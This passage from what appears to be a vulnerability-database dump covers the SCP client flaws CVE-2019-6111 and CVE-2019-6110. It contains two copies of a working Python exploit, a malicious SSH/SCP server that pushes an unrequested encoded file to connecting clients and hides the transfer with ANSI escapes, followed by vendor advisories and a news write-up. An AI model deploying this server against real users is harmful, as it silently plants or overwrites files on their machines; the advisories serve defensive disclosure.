Tested on Python 3.6.7 and requires `paramiko`\npackage.\n\nThe server listens on port 2222. It accepts any username and password, and it\ngenerates a new host key every time you run it.\n\n $ python3 sshtranger_things.py\n\nDownload a file using a vulnerable client. The local path must be a dot:\n\n $ scp -P 2222 foo@localhost:test.txt .\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\n Are you sure you want to continue connecting (yes/no)? yes\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\n foo@localhost's password:\n test.txt 100% 32 0.7KB/s 00:00\n\nThe file you requested (e.g. test.txt) will be saved in your current directory.\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\ncreated in your current directory.\n\n $ cat test.txt\n This is the file you requested.\n $ cat exploit.txt\n SSHtranger Things\n\nThe interesting code is in ScpServer.send_file().\n'''\nimport base64\nimport gzip\nimport logging\nimport paramiko\nimport paramiko.rsakey\nimport socket\nimport threading\n\nlogging.basicConfig(level=logging.INFO)\n\ndummy = 'This is the file you requested.\\n'\npayload = gzip.decompress(base64.b64decode(\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\n 
b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\n))\n\nclass ScpServer(paramiko.ServerInterface):\n def __init__(self):\n self.event = threading.Event()\n\n def check_auth_password(self, username, password):\n logging.info('Authenticated with %s:%s', username, password)\n return paramiko.AUTH_SUCCESSFUL\n\n def check_channel_request(self, kind, chanid):\n logging.info('Opened session channel %d', chanid)\n if kind == \"session\":\n return paramiko.OPEN_SUCCEEDED\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\n\n def check_channel_exec_request(self, channel, command):\n command = command.decode('ascii')\n logging.info('Approving exec request: %s', command)\n parts = command.split(' ')\n # Make sure that this is a request to get a file:\n assert parts[0] == 'scp'\n assert '-f' in parts\n file = parts[-1]\n # Send file from a new thread.\n threading.Thread(target=self.send_file, args=(channel, file)).start()\n return True\n\n def send_file(self, channel, file):\n '''\n The meat of the exploit:\n 1. Send the requested file.\n 2. Send another file (exploit.txt) that was not requested.\n 3. 
Print ANSI escape sequences to stderr to hide the transfer of\n exploit.txt.\n '''\n def wait_ok():\n assert channel.recv(1024) == b'\\x00'\n def send_ok():\n channel.sendall(b'\\x00')\n\n wait_ok()\n\n logging.info('Sending requested file \"%s\" to channel %d', file,\n channel.get_id())\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\n channel.sendall(command)\n wait_ok()\n channel.sendall(dummy)\n send_ok()\n wait_ok()\n\n # This is CVE-2019-6111: whatever file the client requested, we send\n # them 'exploit.txt' instead.\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\n channel.get_id())\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\n channel.sendall(command)\n wait_ok()\n channel.sendall(payload)\n send_ok()\n wait_ok()\n\n # This is CVE-2019-6110: the client will display the text that we send\n # to stderr, even if it contains ANSI escape sequences. We can send\n # ANSI codes that clear the current line to hide the fact that a second\n # file was transmitted..\n logging.info('Covering our tracks by sending ANSI escape sequence')\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\n channel.close()\n\ndef main():\n logging.info('Creating a temporary RSA host key...')\n host_key = paramiko.rsakey.RSAKey.generate(1024)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('localhost', 2222))\n sock.listen(0)\n logging.info('Listening on port 2222...')\n\n while True:\n client, addr = sock.accept()\n logging.info('Received connection from %s:%s', *addr)\n transport = paramiko.Transport(client)\n transport.add_server_key(host_key)\n server = ScpServer()\n transport.start_server(server=server)\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:46", "description": "\nSCP Client - Multiple Vulnerabilities (SSHtranger Things)", 
"edition": 1, "published": "2019-01-18T00:00:00", "title": "SCP Client - Multiple Vulnerabilities (SSHtranger Things)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-18T00:00:00", "id": "EXPLOITPACK:98FE96309F9524B8C84C508837551A19", "href": "", "sourceData": "# Exploit Title: SSHtranger Things\n# Date: 2019-01-17\n# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com>\n# Vendor Homepage: https://www.openssh.com/\n# Software Link: [download link if available]\n# Version: OpenSSH 7.6p1\n# Tested on: Ubuntu 18.04.1 LTS\n# CVE : CVE-2019-6111, CVE-2019-6110\n\n'''\nTitle: SSHtranger Things\nAuthor: Mark E. Haase <mhaase@hyperiongray.com>\nHomepage: https://www.hyperiongray.com\nDate: 2019-01-17\nCVE: CVE-2019-6111, CVE-2019-6110\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\n\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\npackage.\n\nThe server listens on port 2222. It accepts any username and password, and it\ngenerates a new host key every time you run it.\n\n $ python3 sshtranger_things.py\n\nDownload a file using a vulnerable client. The local path must be a dot:\n\n $ scp -P 2222 foo@localhost:test.txt .\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\n Are you sure you want to continue connecting (yes/no)? yes\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\n foo@localhost's password:\n test.txt 100% 32 0.7KB/s 00:00\n\nThe file you requested (e.g. 
test.txt) will be saved in your current directory.\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\ncreated in your current directory.\n\n $ cat test.txt\n This is the file you requested.\n $ cat exploit.txt\n SSHtranger Things\n\nThe interesting code is in ScpServer.send_file().\n'''\nimport base64\nimport gzip\nimport logging\nimport paramiko\nimport paramiko.rsakey\nimport socket\nimport threading\n\nlogging.basicConfig(level=logging.INFO)\n\ndummy = 'This is the file you requested.\\n'\npayload = gzip.decompress(base64.b64decode(\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\n b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\n))\n\nclass ScpServer(paramiko.ServerInterface):\n def __init__(self):\n self.event = threading.Event()\n\n def check_auth_password(self, username, password):\n logging.info('Authenticated with %s:%s', username, password)\n return paramiko.AUTH_SUCCESSFUL\n\n def check_channel_request(self, kind, chanid):\n logging.info('Opened session channel %d', chanid)\n if kind == \"session\":\n return paramiko.OPEN_SUCCEEDED\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\n\n def check_channel_exec_request(self, channel, command):\n command = command.decode('ascii')\n logging.info('Approving exec request: %s', command)\n parts = command.split(' ')\n # Make 
sure that this is a request to get a file:\n assert parts[0] == 'scp'\n assert '-f' in parts\n file = parts[-1]\n # Send file from a new thread.\n threading.Thread(target=self.send_file, args=(channel, file)).start()\n return True\n\n def send_file(self, channel, file):\n '''\n The meat of the exploit:\n 1. Send the requested file.\n 2. Send another file (exploit.txt) that was not requested.\n 3. Print ANSI escape sequences to stderr to hide the transfer of\n exploit.txt.\n '''\n def wait_ok():\n assert channel.recv(1024) == b'\\x00'\n def send_ok():\n channel.sendall(b'\\x00')\n\n wait_ok()\n\n logging.info('Sending requested file \"%s\" to channel %d', file,\n channel.get_id())\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\n channel.sendall(command)\n wait_ok()\n channel.sendall(dummy)\n send_ok()\n wait_ok()\n\n # This is CVE-2019-6111: whatever file the client requested, we send\n # them 'exploit.txt' instead.\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\n channel.get_id())\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\n channel.sendall(command)\n wait_ok()\n channel.sendall(payload)\n send_ok()\n wait_ok()\n\n # This is CVE-2019-6110: the client will display the text that we send\n # to stderr, even if it contains ANSI escape sequences. 
We can send\n # ANSI codes that clear the current line to hide the fact that a second\n # file was transmitted..\n logging.info('Covering our tracks by sending ANSI escape sequence')\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\n channel.close()\n\ndef main():\n logging.info('Creating a temporary RSA host key...')\n host_key = paramiko.rsakey.RSAKey.generate(1024)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('localhost', 2222))\n sock.listen(0)\n logging.info('Listening on port 2222...')\n\n while True:\n client, addr = sock.accept()\n logging.info('Received connection from %s:%s', *addr)\n transport = paramiko.Transport(client)\n transport.add_server_key(host_key)\n server = ScpServer()\n transport.start_server(server=server)\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "suse": [{"lastseen": "2019-01-28T18:05:10", "bulletinFamily": "unix", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "This update for openssh fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-20685: Fixed an issue where scp client allows remote SSH\n servers to bypass intended access restrictions (bsc#1121571)\n - CVE-2019-6109: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate terminal output via the object name,\n e.g. by inserting ANSI escape sequences (bsc#1121816)\n - CVE-2019-6110: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate stderr output, e.g. 
by inserting ANSI\n escape sequences (bsc#1121818)\n - CVE-2019-6111: Fixed an issue where the scp client would allow malicious\n remote SSH servers to execute directory traversal attacks and overwrite\n files (bsc#1121821)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2019-01-28T15:09:07", "published": "2019-01-28T15:09:07", "id": "OPENSUSE-SU-2019:0091-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-01/msg00036.html", "title": "Security update for openssh (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-01-29T18:05:10", "bulletinFamily": "unix", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "This update for openssh fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2018-20685: Fixed an issue where scp client allows remote SSH\n servers to bypass intended access restrictions (bsc#1121571)\n - CVE-2019-6109: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate terminal output via the object name,\n e.g. by inserting ANSI escape sequences (bsc#1121816)\n - CVE-2019-6110: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate stderr output, e.g. 
by inserting ANSI\n escape sequences (bsc#1121818)\n - CVE-2019-6111: Fixed an issue where the scp client would allow malicious\n remote SSH servers to execute directory traversal attacks and overwrite\n files (bsc#1121821)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2019-01-29T15:13:14", "published": "2019-01-29T15:13:14", "id": "OPENSUSE-SU-2019:0093-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-01/msg00041.html", "title": "Security update for openssh (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2019-03-20T18:05:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "### Background\n\nOpenSSH is a complete SSH protocol implementation that includes SFTP client and server support. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could overwrite arbitrary files, transfer malicious files, or gain unauthorized access. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-7.9_p1-r4\"", "edition": 1, "modified": "2019-03-20T00:00:00", "published": "2019-03-20T00:00:00", "id": "GLSA-201903-16", "href": "https://security.gentoo.org/glsa/201903-16", "title": "OpenSSH: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2019-01-15T12:41:21", "bulletinFamily": "info", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "A set of 36-year-old vulnerabilities has been uncovered in the Secure Copy Protocol (SCP) implementation of many client applications that can be exploited by malicious servers to overwrite arbitrary files in the SCP client target directory without authorization. \n \nSession Control Protocol (SCP), also known as secure copy, is a network protocol that allows users to securely transfer files between a local host and a remote host using RCP (Remote Copy Protocol) and SSH protocol. \n \nIn other terms, SCP, which dates back to 1983, is a secure version of RCP that uses authentication and encryption of SSH protocol to transfer files between a server and a client. \n\n\n \nDiscovered by Harry Sintonen, one of F-Secure's Senior Security Consultants, the vulnerabilities exist due to poor validations performed by the SCP clients, which can be abused by malicious servers or man-in-the-middle (MiTM) attackers to drop or overwrite arbitrary files on the client's system. \n\n\n> \"Many scp clients fail to verify if the objects returned by the scp server match those it asked for. 
This issue dates back to 1983 and rcp, on which scp is based. A separate flaw in the client allows the target directory attributes to be changed arbitrarily. Finally, two vulnerabilities in clients may allow server to spoof the client output,\" Sintonen explained.\n\nIn a specific attack scenario, an attacker-controlled server can drop a .bash_aliases file to the victim's home directory, which will trick the system into executing malicious commands within it as soon as the Linux user launches a new shell. \n \nAs explained by the researcher, \"the transfer of extra files is hidden by sending ANSI control sequences via stderr.\" \n\n\n## Multiple SCP Client Vulnerabilities\n\n \nAccording to the [advisory](<https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt>), the following vulnerabilities were discovered in August last year and then responsibly reported to developers of vulnerable clients, including OpenSSH, PuTTY, and WinSCP. \n \n\n\n 1. **SCP client improper directory name validation (CVE-2018-20685)\u2014**A vulnerable scp client could allow a remote SCP server to modify permissions of the target directory by using an empty ('D0777 0 \\n') or dot ('D0777 0 .\\n') directory name.\n 2. **SCP client missing received object name validation (CVE-2019-6111)\u2014**This vulnerability could allow a malicious SCP server to overwrite arbitrary files in the SCP client target directory. If a recursive operation (-r) is performed, the server can manipulate sub-directories as well (for example overwrite .ssh/authorized_keys).\n 3. **SCP client spoofing via object name (CVE-2019-6109)\u2014**Due to missing character encoding in the progress display, the client output can be manipulated using ANSI code to hide additional files being transferred.\n 4. 
**SCP client spoofing via stderr (CVE-2019-6110)\u2014**This issue is also similar to the above one, allowing a malicious server to manipulate the client output.\n \nSince the vulnerabilities impact the implementation of the SCP protocol, all SCP client applications that use SCP as a standard to transfer files, including OpenSSH, PuTTY, and WinSCP, are affected. \n \nWinSCP addressed the issues with the release of [version 5.14](<https://winscp.net/tracker/1675>) last October, and the patch is also included in the current version 5.14.4. \n\n\nCVE-2018-20685 was [patched](<https://github.com/openssh/openssh-portable/commit/6010c0303a422a9c5fa8860c061bf7105eb7f8b2>) in OpenSSH's implementation of the SCP protocol in November, though the fix has not been formally released by the vendor yet. The remaining three vulnerabilities remain unpatched in [version 7.9](<https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html>), the latest version released in October. \n\n\n \nHowever, if you are worried about a malicious SCP server pwning you, you can configure your systems to use SFTP (Secure FTP) if possible. \n \nAlternatively, Sintonen has also provided a fix to harden SCP against most server-side manipulation attempts, which you can apply directly, though it may cause some problems. \n \nIt seems like PuTTY has not fixed the vulnerabilities yet, since the last PuTTY release was version 0.7 in July 2017. \n \nUsers who think the vulnerabilities might impact them are recommended to keep an eye on the patches and apply them as soon as they become available for their client applications. 
\n", "modified": "2019-01-15T12:32:02", "published": "2019-01-15T12:32:00", "id": "THN:445A5A09D3930F981A45FE5AFA1E4CEC", "href": "https://thehackernews.com/2019/01/scp-software-vulnerabilities.html", "type": "thn", "title": "36-Year-Old SCP Clients' Implementation Flaws Discovered", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2020-04-06T22:39:40", "bulletinFamily": "software", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2019-01-18T00:14:00", "published": "2019-01-18T00:14:00", "id": "F5:K31781390", "href": "https://support.f5.com/csp/article/K31781390", "title": "January 2019 OpenSSH security vulnerabilities", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "symantec": [{"lastseen": "2021-02-18T20:47:33", "bulletinFamily": "software", "cvelist": ["CVE-2018-20685", "CVE-2019-15609", 
"CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "**Summary**\n\nSymantec SWG products using affected versions of OpenSSH are susceptible to multiple vulnerabilities. A malicious SCP server or SCP man-in-the-middle (MITM) attacker can modify state on the SCP client host. A local attacker can cause denial of service through OpenSSH application crashes. \n** **\n\n**Affected Product(s)**\n\n**Director** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-20685, CVE-2019-6109 \nCVE-2019-6110, CVE-2019-6111 \n \n| 6.1 | Upgrade to a version of MC with the fixes. \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-20685, CVE-2019-6109 \nCVE-2019-6110, CVE-2019-6111 | 2.3, 2.4 | Upgrade to a later release with fixes. \n3.0 | Not available at this time \n3.1 and later | Not vulnerable, fixed in 3.1.1.1 \n \n \n\n**Security Analytics (SA)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2019-6110 | 7.2 and later | A fix will not be provided because no suitable fix is available for the upstream OpenSSH library. \nCVE-2018-20685, CVE-2019-6109 \nCVE-2019-6111 | 7.2 | Not available at this time \n7.3, 8.0 | Upgrade to a later release with fixes. \n8.1 | Upgrade to 8.1.3 \n8.2 and later | Not vulnerable, fixed in 8.2.1. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-20685, CVE-2019-6109 \nCVE-2019-6110, CVE-2019-6111 | 10.0, 11.0 | A fix will not be provided. 
\n \n \n\n**Additional Product Information**\n\nThe following products are not vulnerable: \n**Advanced Secure Gateway (ASG)** \n**AuthConnector** \n**BCAAA** \n**Content Analysis (CA)** \n**General Auth Connector Login Application** \n**HSM Agent for the Luna SP** \n**Mail Threat Defense (MTD)** \n**ProxySG** \n**Reporter** \n**Security Analytics (SA)** \n**SSL Visibility (SSLV)** \n**Unified Agent** \n**Web Isolation (WI)** \n**WSS Agent** \n**WSS Mobile Agent**\n\nThe following products are under investigation: \n**CacheFlow (CF)** \n**Symantec Messaging Gateway (SMG)**\n\n**Issue Details**\n\n**CVE-2018-20685** \n--- \n**Severity / CVSS v3.0:** | Medium / 5.3 (AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N) \n**References:** | NVD: [CVE-2018-20685](<https://nvd.nist.gov/vuln/detail/CVE-2018-20685> \"NVD - CVE-2018-20685\" ) \n**Impact:** | Unauthorized modification \n**Description:** | A flaw in the SCP client allows a remote malicious SCP server or MITM attacker to send a crafted response and modify permissions of the target client directory. \n \n \n\n**CVE-2019-6109** \n--- \n**Severity / CVSS v3.0:** | Medium / 6.8 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N) \n**References:** | NVD: [CVE-2019-6109](<https://nvd.nist.gov/vuln/detail/CVE-2019-6109> \"NVD - CVE-2019-6109\" ) \n**Impact:** | Unauthorized modification \n**Description:** | A flaw in the SCP client allows a remote malicious SCP server or MITM attacker to send crafted objects and modify the SCP client output, for example to hide additional files being transferred. 
\n \n \n\n**CVE-2019-6110** \n--- \n**Severity / CVSS v3.0:** | Medium / 6.8 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N) \n**References:** | NVD: [CVE-2019-6110](<https://nvd.nist.gov/vuln/detail/CVE-2019-6110> \"NVD - CVE-2019-6110\" ) \n**Impact:** | Unauthorized modification \n**Description:** | A flaw in the SCP client allows a remote malicious SCP server or MITM attacker to send crafted error message and modify the SCP client output, such as hide additional files being transferred. \n \n \n\n**CVE-2019-6111** \n--- \n**Severity / CVSS v3.0:** | Medium / 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N) \n**References:** | NVD: [CVE-2019-6111](<https://nvd.nist.gov/vuln/detail/CVE-2019-6111> \"NVD - CVE-2019-6111\" ) \n**Impact:** | Unauthorized modification \n**Description:** | An insufficient validation flaw in the SCP client allows a remote malicious SCP server or MITM attacker to send files with crafted names and overwrite arbitrary files in the target client directory or in subdirectories. \n \n \n\n**CVE-2019-15609** \n--- \n**Severity / CVSS v3.0:** | High / 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2019-15609](<https://nvd.nist.gov/vuln/detail/CVE-2019-15609> \"NVD - CVE-2019-15609\" ) \n**Impact:** | Denial of service \n**Description:** | A flaw in local XMLSS private key processing allows a local attacker to configure OpenSSH with a crafted XMSS private key and cause denial of service through an OpenSSH application crash. \n \n \n\n**Mitigation & Additional Information**\n\nBy default, X-Series XOS does not use OpenSSH as an SCP client. Customers who leave this behavior unchanged prevent attacks against XOS. \n \n\n\n**Revisions**\n\n2021-02-18 A fix for MC 2.4 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-12-09 A fix for CVE-2018-20685, CVE-2019-6109, and CVE-2019-6111 in SA 8.1 is available in 8.1.3. A fix for CVE-2019-6110 in SA will not be provided. 
SA 8.2 is not vulnerable because a fix is available in 8.2.1. \n2020-11-30 MC 3.1 is not vulnerable because a fix is available in 3.1.1.1. \n2020-11-19 A fix for SA 7.3 and 8.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. A fix for XOS 9.7, 10.0, and 11.0 will not be provided. A fix for Director 6.1 will not be provided. Please upgrade to a version of MC with the vulnerability fixes. \n2020-08-19 A fix for MC 2.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-04-21 initial public release\n", "modified": "2021-02-18T19:05:17", "published": "2020-04-21T20:41:25", "id": "SMNTC-1756", "href": "", "type": "symantec", "title": "OpenSSH Vulnerabilities Jan-Oct 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "aix": [{"lastseen": "2019-07-16T23:56:35", "bulletinFamily": "unix", "cvelist": ["CVE-2018-6110", "CVE-2018-20685", "CVE-2018-6109", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111", "CVE-2018-6111"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Tue Jul 16 09:38:57 CDT 2019\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2018-20685\n CVE-2018-6109 CVE-2018-6110 CVE-2018-6111)\n\n\n===============================================================================\n\nSUMMARY:\n\n Vulnerabilities in OpenSSH affect AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2019-6109\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6109\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6109\n DESCRIPTION: OpenSSH could allow a remote attacker to conduct spoofing \n attacks, 
caused by missing character encoding in the progress display.\n A man-in-the-middle attacker could exploit this vulnerability to spoof\n scp client output.\n CVSS Base Score: 3.1\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/155488 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n CVEID: CVE-2019-6110\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6110\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6110\n DESCRIPTION: OpenSSH could allow a remote attacker to conduct spoofing \n attacks, caused by accepting and displaying arbitrary stderr output \n from the scp server. A man-in-the-middle attacker could exploit this \n vulnerability to spoof scp client output.\n CVSS Base Score: 3.1\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/155487 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n CVEID: CVE-2019-6111\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6111\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6111\n DESCRIPTION: OpenSSH could allow a remote attacker to overwrite \n arbitrary files on the system, caused by missing received object \n name validation by the scp client. 
The scp implementation accepts \n arbitrary files sent by the server and a man-in-the-middle attacker \n could exploit this vulnerability to overwrite unrelated files.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/155486 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\n CVEID: CVE-2018-20685\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20685\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20685\n DESCRIPTION: In OpenSSH 7.9, scp.c in the scp client allows remote \n SSH servers to bypass intended access restrictions via the \n filename of . or an empty filename. The impact is modifying \n the permissions of the target directory on the client side.\n CVSS Base Score: 7.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/155484 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n\n AFFECTED PRODUCTS AND VERSION:\n\n AIX 7.1, 7.2\n VIOS 2.2, 3.1\n\n The following fileset 